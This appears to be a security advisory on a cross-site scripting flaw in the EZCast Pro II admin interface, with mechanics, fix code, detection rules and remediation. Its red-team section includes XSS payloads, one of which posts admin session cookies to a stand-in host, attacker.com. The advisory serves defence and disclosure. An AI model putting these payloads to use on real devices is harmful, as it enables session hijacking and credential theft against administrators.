Executive Summary

CVE-2026-24348 describes multiple stored/reflected cross-site scripting (XSS) vulnerabilities in the Admin UI of EZCast Pro II version 1.17478.146. An attacker can inject arbitrary JavaScript into the administrative interface, which will execute in the browsers of other Admin UI users. This can lead to session hijacking, credential theft, or further compromise of the device management console. No public exploit code or patch is currently available.

Deep Dive & Mechanics

The vulnerability resides in the Admin UI of EZCast Pro II, a wireless presentation and device management system. The application fails to properly sanitize user-supplied input before reflecting or storing it in the admin interface. An attacker can craft a malicious URL or inject payloads into fields such as device names, group names, or configuration parameters. When an administrator views the affected page, the injected script executes in the context of the admin session.

Key attack vectors:

  • Reflected XSS: Malicious link sent to an admin user.
  • Stored XSS: Payload stored in a device name or setting, executed when any admin views the device list.

The lack of Content Security Policy (CSP) headers and output encoding makes exploitation straightforward.

Vulnerable vs. Patched Code

Vulnerable code (conceptual):

// Directly inserting user input into HTML
document.getElementById('deviceName').innerHTML = userInput;

Patched code (expected):

// Using textContent to prevent HTML injection
document.getElementById('deviceName').textContent = userInput;
// Or using a sanitization library
document.getElementById('deviceName').innerHTML = DOMPurify.sanitize(userInput);

No official patch is available. The vendor has not released a fixed version.

Exploitation & Lab Setup

Red Team

Prerequisites:

  • Access to the EZCast Pro II Admin UI (network reachable).
  • Ability to craft a malicious payload.

Step 1: Identify injectable parameters (e.g., device_name, group_name, config).

Step 2: Craft payload:

<script>alert('XSS')</script>

Step 3: Deliver via URL:

http://<target>/admin/device?name=<script>alert('XSS')</script>

Step 4: For stored XSS, submit the payload via a POST request:

POST /admin/device/add HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

name=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

Step 5: Wait for an admin to view the device list.

Blue Team

Detection:

  • Monitor for unusual script tags in HTTP parameters.
  • Alert on document.cookie or fetch in request bodies.
  • Use WAF rules to block <script> and event handlers.

Hunting:

  • Search logs for %3Cscript%3E or &lt;script&gt; patterns.
  • Review Admin UI access logs for anomalous POST data.

Indicators of Compromise (IOCs)

  • Network: HTTP requests containing <script> tags in parameters.
  • Host: Browser console errors or unexpected JavaScript execution.
  • Logs: Admin UI logs showing alert, fetch, or document.cookie in input fields.
  • File: No file-based IOCs.

Remediation & Mitigation

Immediate actions:

  1. Isolate the EZCast Pro II device from untrusted networks.
  2. Restrict Admin UI access to trusted IPs only.
  3. Disable unused features that accept user input.

Long-term fixes:

  • Apply output encoding (HTML entity encoding) to all user-supplied data.
  • Implement Content Security Policy (CSP) headers.
  • Upgrade to a patched version when released.
  • Conduct a full security audit of the Admin UI.

Workaround:

  • Use a reverse proxy with WAF capabilities to filter XSS payloads.
